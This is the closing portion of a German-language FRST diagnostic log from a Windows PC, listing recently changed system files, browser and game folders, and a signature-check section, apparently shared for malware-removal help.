2021-01-22 13:02 - 2010-11-21 04:27 - 000799104 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2021-01-20 14:33 - 2020-11-28 10:18 - 000003606 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6c479638927f6
2021-01-20 14:33 - 2020-11-27 05:58 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 14:20 - 2019-02-18 23:44 - 000001520 _____ C:\Users\elsewhere\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera-Browser.lnk
2021-01-19 19:28 - 2020-12-29 19:22 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-19 19:28 - 2016-01-03 22:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-19 09:11 - 2016-01-03 22:00 - 000000936 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-19 09:10 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2021-01-16 18:46 - 2020-05-25 14:20 - 000000000 ___RD C:\Users\elsewhere\3D Objects
2021-01-15 19:04 - 2020-12-19 14:56 - 000226168 _____ C:\WINDOWS\SysWOW64\PnkBstrB.exe
2021-01-15 19:04 - 2020-12-19 14:56 - 000214392 _____ C:\WINDOWS\SysWOW64\PnkBstrB.ex0
2021-01-14 17:34 - 2020-12-19 14:56 - 000000928 _____ C:\Users\Public\Desktop\Battlefield 3.lnk
2021-01-14 17:34 - 2020-12-19 14:56 - 000000928 _____ C:\ProgramData\Desktop\Battlefield 3.lnk
2021-01-13 22:57 - 2020-05-25 14:36 - 000000000 ____D C:\ProgramData\Packages
2021-01-13 16:33 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 16:33 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 16:33 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\inetsrv
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 16:33 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 02:06 - 2020-11-27 05:50 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 02:02 - 2020-11-27 05:39 - 000146760 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsirpcd.exe
2021-01-13 02:02 - 2020-11-27 05:39 - 000119296 _____ C:\WINDOWS\system32\hvsiproxyapp.exe
2021-01-13 02:02 - 2020-11-27 05:39 - 000082744 _____ C:\WINDOWS\system32\HvsiMachinePolicies.dll
2021-01-13 02:02 - 2020-11-27 05:39 - 000075080 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsimgrps.dll
2021-01-13 02:02 - 2020-11-27 05:39 - 000046392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hvsimgrps.dll
2021-01-13 02:02 - 2020-11-27 05:39 - 000044360 _____ C:\WINDOWS\system32\AuditSettingsProvider.dll
2021-01-13 02:02 - 2019-12-07 10:10 - 000071680 _____ C:\WINDOWS\system32\wdagtool.exe
2021-01-13 02:01 - 2020-12-09 21:43 - 000507216 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmusrv.dll
2021-01-13 02:01 - 2020-12-05 17:31 - 000014848 _____ C:\WINDOWS\system32\hnsproxy.dll
2021-01-13 02:01 - 2020-11-27 05:39 - 000122168 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmsifcore.dll
2021-01-13 02:01 - 2020-11-27 05:39 - 000027960 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmsifproxystub.dll
2021-01-13 02:01 - 2019-12-07 10:09 - 000006658 _____ C:\WINDOWS\system32\VmChipset Third-Party Notices.txt
2021-01-13 01:49 - 2020-05-29 13:32 - 000000000 ____D C:\Program Files (x86)\dotnet
2021-01-13 01:49 - 2016-01-03 15:20 - 000000000 ____D C:\ProgramData\Package Cache
2021-01-13 01:48 - 2020-05-29 13:32 - 000000000 ____D C:\Program Files\dotnet
2021-01-13 01:46 - 2016-01-03 20:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 01:38 - 2016-01-03 20:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-11 23:14 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-01-11 11:18 - 2016-01-29 12:55 - 000000000 ____D C:\Users\elsewhere\AppData\Roaming\vlc
2021-01-09 20:43 - 2019-10-12 12:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2021-01-09 09:25 - 2015-10-08 19:42 - 000000916 _____ C:\Users\Public\Desktop\VLC media player.lnk
2021-01-09 09:25 - 2015-10-08 19:42 - 000000916 _____ C:\ProgramData\Desktop\VLC media player.lnk
2021-01-06 16:11 - 2020-03-28 09:51 - 000000000 ____D C:\Users\Preso\AppData\Local\ElevatedDiagnostics
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2019-05-22 22:26 - 2019-05-22 22:26 - 000000948 _____ () C:\Program Files\Bohemia Interactive.lnk
2019-05-22 22:23 - 2019-05-22 22:23 - 000000849 _____ () C:\Program Files\EA GAMES.lnk
2019-05-22 22:18 - 2019-05-22 22:18 - 000001017 _____ () C:\Program Files (x86)\Crazy Machines II Demo - Verknüpfung.lnk
2019-05-17 20:02 - 2019-05-17 20:02 - 000000751 _____ () C:\Program Files (x86)\Dark Parables 12.lnk
2019-05-17 19:52 - 2019-05-17 19:52 - 000000960 _____ () C:\Program Files (x86)\EA GAMES.lnk
2019-05-22 22:20 - 2019-05-22 22:20 - 000000945 _____ () C:\Program Files (x86)\Rescue2013Demo - Verknüpfung.lnk
2016-01-26 03:48 - 2016-01-26 03:48 - 000000000 _____ () C:\Users\Preso\AppData\Roaming\gdfw.log
2016-01-04 00:22 - 2016-01-26 03:48 - 000002337 _____ () C:\Users\Preso\AppData\Roaming\gdscan.log
2020-12-07 16:16 - 2020-12-07 16:16 - 000000410 _____ () C:\Users\Preso\AppData\Local\oobelibMkey.log
2016-01-03 21:29 - 2020-12-12 19:56 - 000007605 _____ () C:\Users\Preso\AppData\Local\resmon.resmoncfg
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
04.02.2021, 15:11
Baum-Darstellung